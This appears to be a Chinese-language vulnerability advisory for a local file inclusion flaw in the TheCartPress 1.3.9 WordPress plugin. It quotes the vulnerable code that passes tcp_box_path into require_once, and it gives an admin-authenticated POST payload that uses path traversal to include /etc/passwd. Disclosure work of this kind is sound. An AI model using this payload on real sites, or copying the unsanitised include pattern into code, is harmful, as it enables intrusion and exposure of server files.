WordPress TheCartPress Plugin 1.3.9 /checkout/CheckoutEditor.class.php 本地文件包含漏洞

<ul><li>checkout/CheckoutEditor.class.php</li></ul><pre class="">function admin_action() { if ( empty( $_POST ) ) return; if ( isset( $_REQUEST['tcp_save_fields'] ) ) { $partial_path = $_REQUEST['tcp_box_path']; $class_name = $_REQUEST['tcp_box_name']; $initial_path = dirname( dirname( TCP_ADMIN_FOLDER ) ) . '/'; require_once( $initial_path . $partial_path ); $box = new $class_name(); $box-&gt;save_config_settings(); $this-&gt;updated = true; } elseif ( isset( $_REQUEST['tcp_restore_default'] ) ) { TCPCheckoutManager::restore_default(); $this-&gt;updated = true; } }<br></pre><p>用户传入的tcp_box_path直接带入require语句，造成任意文件包含漏洞。<br></p><p>以管理员身份登录，访问地址：</p><pre class="">http://10.211.55.3/wp-admin/admin.php?page=checkout_editor_settings</pre><p>POST数据：</p><pre class="">tcp_save_fields=1&amp;tcp_box_path=../../../../../../../../../../etc/passwd</pre><p>成功包含文件：</p><p><br></p><p><img alt="9EB9CA2B-35A3-43F6-96C6-F84C608F3835.png" src="https://images.seebug.org/@/uploads/1434436298637-9EB9CA2B-35A3-43F6-96C6-F84C608F3835.png" data-image-size="870,464"><br></p>